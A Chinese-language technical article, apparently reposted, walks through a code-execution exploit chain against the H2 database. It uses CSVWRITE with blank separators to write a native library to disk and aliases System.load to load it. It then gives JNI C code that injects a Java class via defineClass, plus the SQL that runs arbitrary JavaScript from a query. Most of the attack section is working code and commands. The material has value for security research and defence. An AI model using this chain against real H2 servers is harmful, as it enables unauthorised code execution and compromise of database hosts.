如何利用原生庫和JNI實現(xiàn)H2數(shù)據(jù)庫漏洞利用

本篇文章給大家分享的是有關(guān)如何利用原生庫和JNI實現(xiàn)H2數(shù)據(jù)庫漏洞利用，小編覺得挺實用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

介紹

通過使用原生庫（.dll或.so）和Java原生接口（JNI），找到一種新的方法來執(zhí)行任意Java代碼，而無需在目標(biāo)服務(wù)器上使用Java編譯器。

H2 能力評估

假設(shè)我們不能使用CREATE ALIAS … AS … 命令，因為Java編譯器不可用。原因可能是它不是Java Development Kit（JDK）而是Java Runtime Environment（JRE），因此沒有編譯器?；蚴怯捎谖凑_設(shè)置PATH環(huán)境變量，導(dǎo)致無法找到Java編譯器javac。

但是，CREATE ALIAS … FOR …  命令可以使用：

當(dāng)引用一個方法時，類必須已經(jīng)被編譯并包含在運行數(shù)據(jù)庫的類路徑中。僅支持靜態(tài)Java方法；類和方法都必須是公共的。

因此各個公共靜態(tài)方法都可以使用。最壞的情況是，只有h3-1.2.141.jar和JRE可用。此外，只有受支持的數(shù)據(jù)類型可用于嵌套函數(shù)調(diào)用。

在Java運行時庫rt.jar中瀏覽candidates時，我們發(fā)現(xiàn)System.load(String)方法允許加載原生庫。這意味著我們可以通過庫的入口點函數(shù)來執(zhí)行代碼。

但如何將庫加載到H2服務(wù)器上呢？雖然Windows上的Java支持UNC路徑并提取文件，但其拒絕實際加載它。而且這在Linux上也不起作用。那么，如何將文件寫入H2服務(wù)器呢？

使用 H2 寫入任意文件

在查看和研究了一些H2函數(shù)后，我們發(fā)現(xiàn)了一個FILE_WRITE文件寫入函數(shù)。不幸的是，F(xiàn)ILE_WRITE是在1.4.190中引入的。而我們需要的是在1.2.141中可用的函數(shù)。最終我們找到了一個名為CSVWRITE的函數(shù)，這也是唯一一個名稱中帶“ write”的函數(shù)。

快速測試顯示了CSV列標(biāo)頭也被打印了出來。查看CSV選項，可以看到有一個writeColumnHeader選項可用于禁用寫入列標(biāo)頭。不幸的是，writeColumnHeader選項僅被添加在了1.3/1.4.177上。

但是在查看其他受支持的選項fieldSeparator，fieldDelimiter，escape，null和lineSeparator時，我蹦出了一個想法：如果我們將它們?nèi)壳蹇?，并使用CSV列標(biāo)頭寫入我們的數(shù)據(jù)，會怎樣？如果H2數(shù)據(jù)庫引擎允許列具有任意長度的任意名稱，那么我們就能夠?qū)懭肴我鈹?shù)據(jù)。

查看H2的列語法，列的columnName可以是帶引號的名稱，定義如下：

" anything " 
帶引號的名稱區(qū)分大小寫，并且可以包含空格。沒有最大名稱長度。兩個雙引號可用于在標(biāo)識符內(nèi)創(chuàng)建一個單雙引號。

這聽起來很完美。讓我們看看我們是否可以在其中放入任意內(nèi)容，以及CSVWRITE是否具有二進制安全機制。

首先，讓我們生成涵蓋所有8-bit octet的測試數(shù)據(jù)：

$ python -c 'import sys;[sys.stdout.write(chr(i)) for i in range(0,256)]' > test.bin
$ sha1sum test.bin
4916d6bdb7f78e6803698cab32d1586ea457dfc8  test.bin

現(xiàn)在我們生成一系列CHAR(n)函數(shù)調(diào)用，它們將在SQL查詢中生成我們的二進制數(shù)據(jù)：

xxd -p -c 256 test.bin | sed -e 's/../),CHAR(0x&/g' -e 's/^),//' -e 's/$/)/' -e 's/CHAR(0x22)/&,&/g'

然后，我們在以下CSVWRITE調(diào)用中使用它：

SELECT CSVWRITE('C:\Windows\Temp\test.bin', CONCAT('SELECT NULL "', … , '"'), 'ISO-8859-1', '', '', '', '', '');

最后，我們測試寫入的文件是否具有相同的校驗和：

C:\Windows\Temp> certutil -hashfile test.bin SHA1
SHA1 hash of file test.bin:
49 16 d6 bd b7 f7 8e 68 03 69 8c ab 32 d1 58 6e a4 57 df c8
CertUtil: -hashfile command completed successfully.

可以看到，文件應(yīng)該是相同的！

進入原生世界

既然我們可以使用內(nèi)置函數(shù)CSVWRITE，將原生庫寫入磁盤并通過為System.load(String)創(chuàng)建別名來加載它，我們就可以使用庫的入口點來實現(xiàn)代碼執(zhí)行。

讓我們更進一步，看看是否有辦法從SQL執(zhí)行任意命令/代碼。

Java Native Interface（JNI）允許原生代碼和Java虛擬機（JVM）之間的交互。因此，在這種情況下，它將允許我們與運行H2數(shù)據(jù)庫的JVM進行交互。

現(xiàn)在，我的想法是使用JNI通過ClassLoader.defineClass(byte[], int, int)將自定義Java類注入到運行的JVM中。這將允許我們創(chuàng)建一個別名并從SQL調(diào)用它。

使用 JNI 調(diào)用 JVM

首先，我們需要獲得正在運行的JVM的句柄。這可以通過JNI_GetCreatedJavaVMs函數(shù)來完成。然后，將當(dāng)前線程附加到VM，并獲得JNI接口指針（JNIEnv）。 使用該指針，我們可以與JVM交互并調(diào)用JNI函數(shù)，例如FindClass, GetStaticMethodID/GetMethodID> 和 CallStatic<Type>Method/Call<Type>Method。 計劃是通過ClassLoader.getSystemClassLoader()獲取系統(tǒng)類加載器并調(diào)用defineClass：

// xxd -p -c 10000 bin/JNIScriptEngine.class | sed -e 's/../0x&,/g' -e 's/^/char buf[] = {/' -e 's/,$/};/'
// public static JNIScriptEngine.eval(String js) : String
char buf[] = { /* ... */ };
size_t bufLen = sizeof(buf);
jbyteArray jData = (*g_env)->NewByteArray(g_env, bufLen);
(*g_env)->SetByteArrayRegion(g_env, jData, 0, bufLen, (jbyte*)buf);
JNIEnv * g_env;
JavaVM* g_vm;
jsize num_vms = 0;
jint result = JNI_GetCreatedJavaVMs(&g_vm, 1, &num_vms);
int getEnvStat = (*g_vm)->GetEnv(g_vm, (void **)&g_env, JNI_VERSION_1_6);
if (getEnvStat == JNI_EDETACHED) {
  // printf("GetEnv: not attached\n");
  if ((*g_vm)->AttachCurrentThread(g_vm, (void **) &g_env, NULL) != 0) {
    // printf("Failed to attach\n");
  }
} else if (getEnvStat == JNI_OK) {
  // printf("GetEnv: everything's fine\n");
} else if (getEnvStat == JNI_EVERSION) {
  // printf("GetEnv: version not supported\n");
}
jclass cls;
jmethodID meth;
jobject obj;
cls = (*g_env)->FindClass(g_env, "java/lang/ClassLoader");
// static java.lang.ClassLoader.getSystemClassLoader() : java.lang.ClassLoader
meth = (*g_env)->GetStaticMethodID(g_env, cls, "getSystemClassLoader", "()Ljava/lang/ClassLoader;");
jobject systemClassLoader = (*g_env)->CallStaticObjectMethod(g_env, cls, meth);
// java.lang.ClassLoader.defineClass(byte[], int, int) : java.lang.Class
meth = (*g_env)->GetMethodID(g_env, cls, "defineClass", "([BII)Ljava/lang/Class;");
jobject loadedClass = (*g_env)->CallObjectMethod(g_env, systemClassLoader, meth, jData, 0, (jint)bufLen);
(*g_env)->DeleteLocalRef(g_env, jData);
(*g_vm)->DetachCurrentThread(g_vm);

這基本上是模仿了以下Java代碼：

Class cls = Class.forName("java.lang.ClassLoader");
Method meth = cls.getDeclaredMethod("getSystemClassLoader", new Class[0]);
Object systemClassLoader = meth.invoke(null, new Object[0]);
meth = cls.getDeclaredMethod("defineClass", new Class[] { byte[].class, int.class, int.class });
meth.setAccessible(true);
meth.invoke(systemClassLoader, new Object[] { jData, 0, jData.length });

自定義Java類JNIScriptEngine只有一個公共靜態(tài)方法，它使用可用的ScriptEngine實例評估傳遞的腳本：

public class JNIScriptEngine {
  public static String eval(String script) throws Exception {
    return new javax.script.ScriptEngineManager().getEngineFactories().get(0).getScriptEngine().eval(script).toString();
  }
}

最終，整合在一起的代碼如下：

-- write native library
SELECT CSVWRITE('C:\Windows\Temp\JNIScriptEngine.dll', CONCAT('SELECT NULL "', ... , '"'), 'ISO-8859-1', '', '', '', '', '');
-- load native library
CREATE ALIAS IF NOT EXISTS System_load FOR "java.lang.System.load";
CALL System_load('C:\Windows\Temp\JNIScriptEngine.dll');
-- evaluate script
CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('7*191');

這樣我們就可以從SQL執(zhí)行任意的JavaScript代碼了。

以上就是如何利用原生庫和JNI實現(xiàn)H2數(shù)據(jù)庫漏洞利用，小編相信有部分知識點可能是我們?nèi)粘９ぷ鲿姷交蛴玫降?。希望你能通過這篇文章學(xué)到更多知識。更多詳情敬請關(guān)注億速云行業(yè)資訊頻道。